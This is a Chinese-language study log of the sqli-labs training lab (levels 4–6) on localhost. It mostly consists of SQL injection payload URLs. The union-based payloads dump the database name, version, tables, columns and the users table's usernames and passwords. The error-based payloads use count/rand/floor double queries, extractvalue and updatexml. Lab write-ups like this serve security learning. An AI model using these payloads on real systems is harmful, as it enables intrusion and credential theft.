sqli-labs学习记录(二)

0x04 less-4

在网上发现了另一种姿势避免limit的多次使用,就是用group_concat来一次性列出,在数据量比较少的时候很实用!

后台查询语句

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

payload

http://localhost/sqli-labs-master/Less-4/?id=1'   //此处服务器没有报错,因为后台采用双引号,双引号可以包含单引号,依然被执行


http://localhost/sqli-labs-master/Less-4/?id=2"   //用双引号测试,报错

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,3-- +  //回显2.3列

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,concat_ws(':',user(),database(),version())-- + //当前用户、当前数据库、版本

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479-- + 

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273-- +

http://localhost/sqli-labs-master/Less-4/?id=0") union select 1,2,concat_ws(':',id,username,password) from users limit 2,1-- +

0x05 less-5

从第五关开始发现,和第一关相同,但是网页返回 you are in……
双注入单引号字符型注入

预备知识

count():统计元组的个数
rand():返回一个0~1之间的随机数
floor():向下取整
group by:用于结合合计函数,根据一个或多个列对结果集进行分组

http://localhost/sqli-labs-master/Less-5/?id=1 union select 1,2,3-- +


http://localhost/sqli-labs-master/Less-5/?id=1' and (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)-- +
//返回错误信息Operand should contain 1 column(s),也就是说只能返回一列

要注意因为是rand所以有时候没显示结果需要刷新一下

http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a))-- +
//返回错误Every derived table must have its own alias,每个派生出来的表都必须有一个自己的别名
http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from (select count(*),concat((select database()), '  ',floor(rand()*2)) as a from information_schema.columns group by a ) b)-- +
//得到数据库名 


http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//得到当前链接

http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//得到当前版本信息


http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//表名


http://localhost/sqli-labs-master/Less-5/?id=1' and (select 1 from(select count(*),concat(0x3a,0x3a,(select concat_ws(':',id,username,password) from users where table_schema=database() limit 2,1),0x3a,0x3a,floor(rand()*2)) as a from information_schema.columns group by a)b)-- +
//id/username/password

使用这种双注入的方法。对于基于错误的SQL注入来说,还有其它办法。
1.使用extractvalue
extractvalue(xml_frag,xpath_expr)
extractvalue()接受两个字符串参数,一个xml标记xml_frag的片段和一个xpath表达式xpath_expr(也称为定位符)。这个函数返回第一个文本节点的文本。在mysql 5.6.6及更早版本中,xpath表达式最多可以包含127个字符。这个限制在mysql 5.6.7中解除。我们可以在xpath中填写获得我们想要的信息的语句。

http://localhost/sqli-labs-master/Less-5/?id=1' and 1=extractvalue(1,concat(0x5e24,(select concat_ws(':',user(),database(),version()))))-- +

2.使用updatexml
updatexml(xml_target,xpath_expr,new_xml)
此函数用新的xml片段new_xml替换xml标记xml_target的给定片段的单个部分,然后返回更改的xml。被替换的xml_target的部分与用户提供的xpath表达式xpath_expr匹配。在 mysql 5.6.6及更早版本中,xpath表达式最多可以包含127个字符。这个限制在mysql 5.6.7中解除。如果没有找到匹配xpath_expr的表达式,或者找到多个匹配项,函数将返回原始的xml_target片段。 所有三个参数应该是字符串。我们可以在xpath中填写获得我们想要的信息的语句。

0x06 less-6

单引号变成了双引号,其余的和第五关没区别

http://localhost/sqli-labs-master/Less-6/?id=1" and (select 1 from (select count(*),concat((select database()), '  ',floor(rand()*2)) as a from information_schema.columns group by a ) b)-- +

等等同第五关

关于双注入的原理还是不太懂的,下面推荐freebuf的一篇文章,写得还算通俗
传送门

你可能感兴趣的:(sql-injection)